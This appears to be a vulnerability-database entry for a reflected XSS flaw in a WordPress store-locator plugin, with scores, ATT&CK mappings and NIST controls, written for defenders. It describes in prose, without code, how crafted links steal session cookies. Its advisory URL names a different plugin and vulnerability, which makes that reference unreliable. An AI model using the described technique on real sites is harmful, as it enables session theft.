Cyber Resilience

CVE-2025-25161

High

Published: 03 March 2025

Published
03 March 2025
Modified
23 April 2026
KEV Added
Patch
CVSS Score v3.1 7.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
EPSS Score 0.0035 57.6th percentile
Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-25161 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203); ranked in the top 42.4% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-25161 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-Site Scripting (XSS) under CWE-79, affecting the WP Find Your Nearest WordPress plugin developed by SocialEvolution. The issue impacts all versions of the plugin up to and including 0.3.1, with no lower bound specified. Published on March 3, 2025, it carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating high severity due to its network accessibility, low attack complexity, lack of required privileges, user interaction dependency, and changed scope.

Remote attackers without authentication can exploit this reflected XSS flaw by crafting malicious links or inputs that, when interacted with by a victim user (such as clicking a link or submitting a form), inject and execute arbitrary JavaScript in the victim's browser context. Successful exploitation enables limited impacts, including low-level disclosure of sensitive data (e.g., cookies or session tokens), minor data modification, and negligible denial of service, all within the scope of the compromised site.

The Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/wp-find-your-nearest/vulnerability/wordpress-globalquran-plugin-1-0-csrf-to-settings-change-vulnerability-2?_s_id=cve provides details on the vulnerability, recommending mitigation through updating to a patched version of the WP Find Your Nearest plugin where available or removing the plugin if no update exists. Security practitioners should scan environments for vulnerable installations and apply defenses like Content Security Policy (CSP) to reduce XSS risks in the interim.

EU & UK References

Vulnerability details

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SocialEvolution WP Find Your Nearest wp-find-your-nearest allows Reflected XSS.This issue affects WP Find Your Nearest: from n/a through <= 0.3.1.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1203 Exploitation for Client Execution Execution
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1204.001 Malicious Link Execution
An adversary may rely upon a user clicking a malicious link in order to gain execution.
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Reflected XSS enables arbitrary JS execution in browser via malicious links (T1203 Exploitation for Client Execution, T1204.001 Malicious Link) and directly facilitates theft of session cookies/tokens as described.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-23587Shared CWE-79
CVE-2025-24646Shared CWE-79
CVE-2025-26584Shared CWE-79
CVE-2025-23602Shared CWE-79
CVE-2025-26536Shared CWE-79
CVE-2025-24599Shared CWE-79
CVE-2025-23619Shared CWE-79
CVE-2025-23540Shared CWE-79
CVE-2025-24708Shared CWE-79
CVE-2025-23475Shared CWE-79

Affected Assets

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires identifying, reporting, and correcting the specific reflected XSS flaw in the WP Find Your Nearest plugin through patching or removal.

prevent

Mandates filtering information outputs to neutralize untrusted input during web page generation, preventing arbitrary JavaScript execution in reflected XSS attacks.

prevent

Requires validation of user inputs to block or sanitize malicious payloads that could be reflected as executable scripts in the victim's browser.

References